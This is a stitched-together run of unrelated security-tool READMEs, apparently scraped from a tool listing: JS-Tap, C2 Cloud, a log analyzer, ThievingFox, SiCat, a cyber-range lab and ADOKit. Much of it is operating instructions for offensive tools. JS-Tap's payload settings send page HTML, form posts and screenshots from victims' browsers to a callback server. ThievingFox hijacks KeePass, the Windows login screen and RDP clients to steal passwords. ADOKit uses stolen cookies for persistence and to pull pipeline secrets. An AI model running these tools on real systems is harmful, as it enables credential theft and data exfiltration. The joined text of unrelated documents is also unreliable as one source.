mkdir jsTapEnvironment
python3 -m venv jsTapEnvironment
source jsTapEnvironment/bin/activate
cd jsTapEnvironment
git clone https://github.com/hoodoer/JS-Tap
cd JS-Tap
pip3 install -r requirements.txt
run in debug/single thread mode:
python3 jsTapServer.py
run with gunicorn multithreaded (production use):
./jstapRun.sh
A new admin password is generated on startup. If you didn't catch it in the startup print statements you can find the credentials saved to the adminCreds.txt file.
If an existing database is found by jsTapServer on startup it will ask you if you want to keep existing clients in the database or drop those tables to start fresh.
Note that on Mac I also had to install libmagic outside of python.
brew install libmagic
Playing with JS-Tap locally is fine, but to use in a proper engagment you'll need to be running JS-Tap on publicly accessible VPS and setup JS-Tap with PROXYMODE set to True. Use NGINX on the front end to handle a valid certificate.
If you're running JS-Tap with the jsTapServer.py script in single threaded mode (great for testing/demos) there are configuration options directly in the jsTapServer.py script.
For production use JS-Tap should be hosted on a publicly available server with a proper SSL certificate from someone like letsencrypt. The easiest way to deploy this is to allow NGINX to act as a front-end to JS-Tap and handle the letsencrypt cert, and then forward the decrypted traffic to JS-Tap as HTTP traffic locally (i.e. NGINX and JS-Tap run on the same VPS).
If you set proxyMode to true, JS-Tap server will run in HTTP mode, and take the client IP address from the X-Forwarded-For header, which NGINX needs to be configured to set.
When proxyMode is set to false, JS-Tap will run with a self-signed certificate, which is useful for testing. The client IP will be taken from the source IP of the client.
The dataDirectory parameter tells JS-Tap where the directory is to use for the SQLite database and loot directory. Not all "loot" is stored in the database, screenshots and scraped HTML files in particular are not.
To change the server port configuration see the last line of jsTapServer.py
app.run(debug=False, host='0.0.0.0', port=8444, ssl_context='adhoc')
Gunicorn is the preferred means of running JS-Tap in production. The same settings mentioned above can be set in the jstapRun.sh bash script. Values set in the startup script take precedence over the values set directly in the jsTapServer.py script when JS-Tap is started with the gunicorn startup script.
A big difference in configuration when using Gunicorn for serving the application is that you need to configure the number of workers (heavy weight processes) and threads (lightweight serving processes). JS-Tap is a very I/O heavy application, so using threads in addition to workers is beneficial in scaling up the application on multi-processor machines. Note that if you're using NGINX on the same box you need to configure NGNIX to also use multiple processes so you don't bottleneck on the proxy itself.
At the top of the jstapRun.sh script are the numWorkers and numThreads parameters. I like to use number of CPUs + 1 for workers, and 4-8 threads depending on how beefy the processors are. For NGINX in its configuration I typically set worker_processes auto;
Proxy Mode is set by the PROXYMODE variable, and the data directory with the DATADIRECTORY variable. Note the data directory variable needs a trailing '/' added.
Using the gunicorn startup script will use a self-signed cert when started with PROXYMODE set to False. You need to generate that self-signed cert first with:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
These configuration variables are in the initGlobals() function.
You need to configure the payload with the URL of the JS-Tap server it will connect back to.
window.taperexfilServer = "https://127.0.0.1:8444";
Set to either trap or implant This is set with the variable:
window.taperMode = "trap";
or
window.taperMode = "implant";
Only needed for trap mode. See explanation in Operating Modes section above.
Sets the page the user starts on when the iFrame trap is set.
window.taperstartingPage = "http://targetapp.com/somestartpage";
If you want the trap to start on the current page, instead of redirecting the user to a different page in the iframe trap, you can use:
window.taperstartingPage = window.location.href;
Useful if you're using JS-Tap against multiple applications or deployments at once and want a visual indicator of what payload was loaded. Remember that the entire /payloads directory is served, you can have multiple JS-Tap payloads configured with different modes, start pages, and clien tags.
This tag string (keep it short!) is prepended to the client nickname in the JS-Tap portal. Setup multiple payloads, each with the appropriate configuration for the application its being used against, and add a tag indicating which app the client is running.
window.taperTag = 'whatever';
Used to set if clients are checking for Custom Payload tasks, and how often they're checking. The jitter settings Let you optionally set a floor and ceiling modifier. A random value between these two numbers will be picked and added to the check delay. Set these to 0 and 0 for no jitter.
window.taperTaskCheck = true;
window.taperTaskCheckDelay = 5000;
window.taperTaskJitterBottom = -2000;
window.taperTaskJitterTop = 2000;
true/false setting on whether a copy of the HTML code of each page viewed is exfiltrated.
window.taperexfilHTML = true;
true/false setting on whether to intercept a copy of all form posts.
window.taperexfilFormSubmissions = true;
Enable monkeypatching of XHR and Fetch APIs. This works in trap mode. In implant mode, only Fetch APIs are monkeypatched. Monkeypatching allows JavaScript to be rewritten at runtime. Enabling this feature will re-write the XHR and Fetch networking APIs used by JavaScript code in order to tap the contents of those network calls. Not that jQuery based network calls will be captured in the XHR API, which jQuery uses under the hood for network calls.
window.monkeyPatchAPIs = true;
By default JS-Tap will capture a new screenshot after the user navigates to a new page. Some applications do not change their path when new data is loaded, which would cause missed screenshots. JS-Tap can be configured to capture a new screenshot after an XHR or Fetch API call is made. These API calls are often used to retrieve new data to display. Two settings are offered, one to enable the "after API call screenshot", and a delay in milliseconds. X milliseconds after the API call JS-Tap will capture the new screenshot.
window.postApiCallScreenshot = true;
window.screenshotDelay = 1000;
Login with the admin credentials provided by the server script on startup.
Clients show up on the left, selecting one will show a time series of their events (loot) on the right.
The clients list can be sorted by time (first seen, last update received) and the list can be filtered to only show the "starred" clients. There is also a quick filter search above the clients list that allows you to quickly filter clients that have the entered string. Useful if you set an optional tag in the payload configuration. Optional tags show up prepended to the client nickname.
Each client has an 'x' button (near the star button). This allows you to delete the session for that client, if they're sending junk or useless data, you can prevent that client from submitting future data.
When the JS-Tap payload starts, it retrieves a session from the JS-Tap server. If you want to stop all new client sessions from being issues, select Session Settings at the top and you can disable new client sessions. You can also block specific IP addresses from receiving a session in here.
Each client has a "notes" feature. If you find juicy information for that particular client (credentials, API tokens, etc) you can add it to the client notes. After you've reviewed all your clients and made you notes, the View All Notes feature at the top allows you to export all notes from all clients at once.
The events list can be filtered by event type if you're trying to focus on something specific, like screenshots. Note that the events/loot list does not automatically update (the clients list does). If you want to load the latest events for the client you need to select the client again on the left.
Starting in version 1.02 there is a custom payload feature. Multiple JavaScript payloads can be added in the JS-Tap portal and executed on a single client, all current clients, or set to autorun on all future clients. Payloads can be written/edited within the JS-Tap portal, or imported from a file. Payloads can also be exported. The format for importing payloads is simple JSON. The JavaScript code and description are simply base64 encoded.
[{"code":"YWxlcnQoJ1BheWxvYWQgMSBmaXJpbmcnKTs=","description":"VGhlIGZpcnN0IHBheWxvYWQ=","name":"Payload 1"},{"code":"YWxlcnQoJ1BheWxvYWQgMiBmaXJpbmcnKTs=","description":"VGhlIHNlY29uZCBwYXlsb2Fk","name":"Payload 2"}]
The main user interface for custom payloads is from the top menu bar. Select Custom Payloads to open the interface. Any existing payloads will be shown in a list on the left. The button bar allows you to import and export the list. Payloads can be edited on the right side. To load an existing payload for editing select the payload by clicking on it in the Saved Payloads list. Once you have payloads defined and saved, you can execute them on clients.
In the main Custom Payloads view you can launch a payload against all current clients (the Run Payload button). You can also toggle on the Autorun attribute of a payload, which means that all new clients will run the payload. Note that existing clients will not run a payload based on the Autorun setting.
You can toggle on Repeat Payload and the payload will be tasked for each client when they check for tasks. Remember, the rate that a client checks for custom payload tasks is variable, and that rate can be changed in the main JS-Tap payload configuration. That rate can be changed with a custom payload (calling the updateTaskCheckInterval(newDelay) function). The jitter in the task check delay can be set with the updateTaskCheckJitter(newTop, newBottom) function.
The Clear All Jobs button in the custom payload UI will delete all custom payload jobs from the queue for all clients and resets the auto/repeat run toggles.
To run a payload on a single client user the Run Payload button on the specific client you wish to run it on, and then hit the run button for the specific payload you wish to use. You can also set Repeat Payload on individual clients.
A few tools are included in the tools subdirectory.
A script to stress test the jsTapServer. Good for determining roughly how many clients your server can handle. Note that running the clientSimulator script is probably more resource intensive than the actual jsTapServer, so you may wish to run it on a separate machine.
At the top of the script is a numClients variable, set to how many clients you want to simulator. The script will spawn a thread for each, retrieve a client session, and send data in simulating a client.
numClients = 50
You'll also need to configure where you're running the jsTapServer for the clientSimulator to connect to:
apiServer = "https://127.0.0.1:8444"
JS-Tap run using gunicorn scales quite well.
A simple app used for testing XHR/Fetch monkeypatching, but can give you a simple app to test the payload against in general.
Run with:
python3 monkeyPatchLab.py
By default this will start the application running on:
https://127.0.0.1:8443
Pressing the "Inject JS-Tap payload" button will run the JS-Tap payload. This works for either implant or trap mode. You may need to point the monkeyPatchLab application at a new JS-Tap server location for loading the payload file, you can find this set in the injectPayload() function in main.js
function injectPayload()
{
document.head.appendChild(Object.assign(document.createElement('script'),
{src:'https://127.0.0.1:8444/lib/telemlib.js',type:'text/javascript'}));
}
Abandoned tool, is a good start on analyzing HTML for forms and parsing out their parameters. Intended to help automatically generate JavaScript payloads to target form posts.
You should be able to run it on exfiltrated HTML files. Again, this is currently abandonware.
No longer working, used before the web UI for JS-Tap. The generateIntelReport script would comb through the gathered loot and generate a PDF report. Saving all the loot to disk is now disabled for performance reasons, most of it is stored in the datagbase with the exception of exfiltratred HTML code and screenshots.
@hoodoer
hoodoer@bitwisemunitions.dev
The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.
C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.
Reverse shells support:
C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk
π Anywhere Access: Reach the C2 Cloud from any location.
π Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
π±οΈ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
π Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.
π οΈ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
π TCP Socket: Serving reverse TCP requests for enhanced functionality.
π Nginx: Effortlessly routing traffic between web and backend systems.
π¨ Redis PubSub: Serving as a robust message broker for seamless communication.
π Websockets: Delivering real-time updates to browser clients for enhanced user experience.
πΎ Postgres DB: Ensuring persistent storage for seamless continuity.
Reverse TCP port: 8888
Clone the repo
Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.
Distributed under the MIT License. See LICENSE for more information.
Automate the process of analyzing web server logs with the Python Web Log Analyzer. This powerful tool is designed to enhance security by identifying and detecting various types of cyber attacks within your server logs. Stay ahead of potential threats with features that include:
Attack Detection: Identify and flag potential Cross-Site Scripting (XSS), Local File Inclusion (LFI), Remote File Inclusion (RFI), and other common web application attacks.
Rate Limit Monitoring: Detect suspicious patterns in multiple requests made in a short time frame, helping to identify brute-force attacks or automated scanning tools.
Automated Scanner Detection: Keep your web applications secure by identifying requests associated with known automated scanning tools or vulnerability scanners.
User-Agent Analysis: Analyze and identify potentially malicious User-Agent strings, allowing you to spot unusual or suspicious behavior.
This project is actively developed, and future features may include:
The tool only requires Python 3 at the moment.
After cloning the repository to your local machine, you can initiate the application by executing the command python3 WLA-cli.py. simple usage example : python3 WLA-cli.py -l LogSampls/access.log -t
use -h or --help for more detailed usage examples : python3 WLA-cli.py -h
linkdin:(https://www.linkedin.com/in/oudjani-seyyid-taqy-eddine-b964a5228)
ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internals functions to gather crendentials.
The accompanying blog post can be found here
Rustup must be installed, follow the instructions available here : https://rustup.rs/
The mingw-w64 package must be installed. On Debian, this can be done using :
apt install mingw-w64
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-gnu
rustup target add i686-pc-windows-gnu
Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin
After adding Mono repositories, Nuget can be installed using apt :
apt install nuget
Finally, python dependancies must be installed :
pip install -r client/requirements.txt
ThievingFox works with python >= 3.11
.
Rustup must be installed, follow the instructions available here : https://rustup.rs/
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-msvc
rustup target add i686-pc-windows-msvc
.NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"
Finally, python dependancies must be installed :
pip install -r client/requirements.txt
ThievingFox works with python >= 3.11
NOTE : On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developper Powershell (Tools > Command Line > Developper Powershell)
All modules have been tested on the following Windows versions :
Windows Version |
---|
Windows Server 2022 |
Windows Server 2019 |
Windows Server 2016 |
Windows Server 2012R2 |
Windows 10 |
Windows 11 |
[!CAUTION] Modules have not been tested on other version, and are expected to not work.
Application | Injection Method |
---|---|
KeePass.exe | AppDomainManager Injection |
KeePassXC.exe | DLL Proxying |
LogonUI.exe (Windows Login Screen) | COM Hijacking |
consent.exe (Windows UAC Popup) | COM Hijacking |
mstsc.exe (Windows default RDP client) | COM Hijacking |
RDCMan.exe (Sysinternals' RDP client) | COM Hijacking |
MobaXTerm.exe (3rd party RDP client) | COM Hijacking |
[!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the
cleanup
module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.
ThievingFox contains 3 main modules : poison
, cleanup
and collect
.
For each application specified in the command line parameters, the poison
module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that has matches the properties of the original DLL, uploads it to the server, and modify the registry if needed to perform COM hijacking.
To speed up the process of compilation of all libraries, a cache is maintained in client/cache/
.
--mstsc
, --rdcman
, and --mobaxterm
have a specific option, respectively --mstsc-poison-hkcr
, --rdcman-poison-hkcr
, and --mobaxterm-poison-hkcr
. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR
hive, meaning all users will be impacted. By default, only all currently logged in users are impacted (all users that have a HKCU
hive).
--keepass
and --keepassxc
have specific options, --keepass-path
, --keepass-share
, and --keepassxc-path
, --keepassxc-share
, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.
The KeePass modules requires the Visual C++ Redistributable
to be installed on the target.
Multiple applications can be specified at once, or, the --all
flag can be used to target all applications.
[!IMPORTANT] Remember to clean the cache if you ever change the
--tempdir
parameter, since the directory name is embedded inside native DLLs.
$ python3 client/ThievingFox.py poison -h
usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
[--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
[--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to poison KeePass.exe
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepassxc Try to poison KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--ke epassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to poison mstsc.exe
--mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
logged in (Default: False)
--consent Try to poison Consent.exe
--logonui Try to poison LogonUI.exe
--rdcman Try to poison RDCMan.exe
--rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
logged in (Default: False)
--mobaxterm Try to poison MobaXTerm.exe
--mobaxterm-poison-hkcr
Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
logged in (Default: False)
--all Try to poison all applications
For each application specified in the command line parameters, the cleanup
first removes poisonning artifacts that force the target application to load the hooking library. Then, it tries to delete the library that were uploaded to the remote host.
For applications that support poisonning of both HKCU
and HKCR
hives, both are cleaned up regardless.
Multiple applications can be specified at once, or, the --all
flag can be used to cleanup all applications.
It does not clean extracted credentials on the remote host.
[!IMPORTANT] If the targeted application is in use while the
cleanup
module is ran, the DLL that are dropped on the target cannot be deleted. Nonetheless, thecleanup
module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted byThievingFox
are logged.
$ python3 client/ThievingFox.py cleanup -h
usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
[--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
[--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and cons ent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisonning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
--consent Try to cleanup all poisonning artifacts related to Consent.exe
--logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisonning artifacts related to all applications
For each application specified on the command line parameters, the collect
module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir>
corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/
.
Multiple applications can be specified at once, or, the --all
flag can be used to collect logs from all applications.
$ python3 client/ThievingFox.py collect -h
usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
[--logonui] [--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of th e domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Collect KeePass.exe logs
--keepassxc Collect KeePassXC.exe logs
--mstsc Collect mstsc.exe logs
--consent Collect Consent.exe logs
--logonui Collect LogonUI.exe logs
--rdcman Collect RDCMan.exe logs
--mobaxterm Collect MobaXTerm.exe logs
--all Collect logs from all applications
bash git clone https://github.com/your_username/status-checker.git cd status-checker
bash pip install -r requirements.txt
python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
-d
, --domain
: Single domain/URL to check.-l
, --list
: File containing a list of domains/URLs to check.-o
, --output
: File to save the output.-v
, --version
: Display version information.-update
: Update the tool.Example:
python status_checker.py -l urls.txt -o results.txt
This project is licensed under the MIT License - see the LICENSE file for details.
The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing Cybersecurity" title="Cybersecurity">cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective Cybersecurity" title="Cybersecurity">cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational m aterials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.
Clone the repository
git clone https://github.com/csalab-id/csaf.git
Navigate to the project directory
cd csaf
Pull the Docker images
docker-compose --profile=all pull
Generate wazuh ssl certificate
docker-compose -f generate-indexer-certs.yml run --rm generator
For security reason you should set env like this first
export ATTACK_PASS=ChangeMePlease
export DEFENSE_PASS=ChangeMePlease
export MONITOR_PASS=ChangeMePlease
export SPLUNK_PASS=ChangeMePlease
export GOPHISH_PASS=ChangeMePlease
export MAIL_PASS=ChangeMePlease
export PURPLEOPS_PASS=ChangeMePlease
Start all the containers
docker-compose --profile=all up -d
You can run specific profiles for running specific labs with the following profiles - all - attackdefenselab - phisinglab - breachlab - soclab
For example
docker-compose --profile=attackdefenselab up -d
An exposed port can be accessed using a proxy socks5 client, SSH client, or HTTP client. Choose one for the best experience.
This Docker Compose application is released under the MIT License. See the LICENSE file for details.
SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.
SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.
git clone https://github.com/justakazh/sicat.git && cd sicat
pip install -r requirements.txt
~$ python sicat.py --help
Command | Description |
---|---|
-h | Show help message and exit |
-k KEYWORD | |
-kv KEYWORK_VERSION | |
-nm | Identify via nmap output |
--nvd | Use NVD as info source |
--packetstorm | Use PacketStorm as info source |
--exploitdb | Use ExploitDB as info source |
--exploitalert | Use ExploitAlert as info source |
--msfmoduke | Use metasploit as info source |
-o OUTPUT | Path to save output to |
-ot OUTPUT_TYPE | Output file type: json or html |
From keyword
python sicat.py -k telerik --exploitdb --msfmodule
From nmap output
nmap --open -sV localhost -oX nmap_out.xml
python sicat.py -nm nmap_out.xml --packetstorm
I'm aware that perfection is elusive in coding. If you come across any bugs, feel free to contribute by fixing the code or suggesting new features. Your input is always welcomed and valued.
Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.
Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.
The below 3rd party libraries are used in this project.
Library | URL | License |
---|---|---|
Fody | https://github.com/Fody/Fody | MIT License |
Newtonsoft.Json | https://github.com/JamesNK/Newtonsoft.Json | MIT License |
Take the below steps to setup Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.
https://api.nuget.org/v3/index.json
Install-Package Costura.Fody -Version 3.3.3
Install-Package Newtonsoft.Json
Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.
UserAuthentication
cookie on a user's machine for the .dev.azure.com
domain./credential:UserAuthentication=ABC123
/credential:apiToken
The below table shows the permissions required for each module.
Attack Scenario | Module | Special Permissions? | Notes |
---|---|---|---|
Recon | check | No | |
Recon | whoami | No | |
Recon | listrepo | No | |
Recon | searchrepo | No | |
Recon | listproject | No | |
Recon | searchproject | No | |
Recon | searchcode | No | |
Recon | searchfile | No | |
Recon | listuser | No | |
Recon | searchuser | No | |
Recon | listgroup | No | |
Recon | searchgroup | No | |
Recon | getgroupmembers | No | |
Recon | getpermissions | No | |
Persistence | createpat | No | |
Persistence | listpat | No | |
Persistence | removepat | No | |
Persistence | createsshkey | No | |
Persistence | listsshkey | No | |
Persistence | removesshkey | No | |
Privilege Escalation | addprojectadmin | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removeprojectadmin | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | addbuildadmin | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removebuildadmin | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | addcollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removecollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | addcollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removecollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | addcollectionbuildsvc | Yes - Project Collection Administrator , Project Colection Build Administrators or Project Collection Service Accounts
| |
Privilege Escalation | removecollectionbuildsvc | Yes - Project Collection Administrator , Project Colection Build Administrators or Project Collection Service Accounts
| |
Privilege Escalation | addcollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | removecollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts
| |
Privilege Escalation | getpipelinevars | Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
| |
Privilege Escalation | getpipelinesecrets | Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
| |
Privilege Escalation | getserviceconnections | Yes - Project Administrator , Project Collection Administrator or Project Collection Service Accounts
|
Perform authentication check to ensure that organization is using Azure DevOps and that provided credentials are valid.
Provide the check
module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.
ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: check
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/28/2023 3:33:01 PM
==================================================
[*] INFO: Checking if organization provided uses Azure DevOps
[+] SUCCESS: Organization provided exists in Azure DevOps
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
3/28/23 19:33:02 Finished execution of check
Get the current user and the user's group memberhips
Provide the whoami
module, along with any relevant authentication information and URL. This will output the current user and all of its group memberhips.
ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization
==================================================
Module: whoami
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 11:33:12 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft. com
[*] INFO: Listing group memberships for the current user
Group UPN | Display Name | Description
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
4/4/23 15:33:19 Finished execution of whoami
Discover repositories being used in Azure DevOps instance
Provide the listrepo
module, along with any relevant authentication information and URL. This will output the repository name and URL.
ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listrepo
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 8:41:50 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
SomeOtherRepo | https://dev.azure.com/YourOrganization/Projec tWithMultipleRepos/_git/SomeOtherRepo
AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject
3/29/23 12:41:53 Finished execution of listrepo
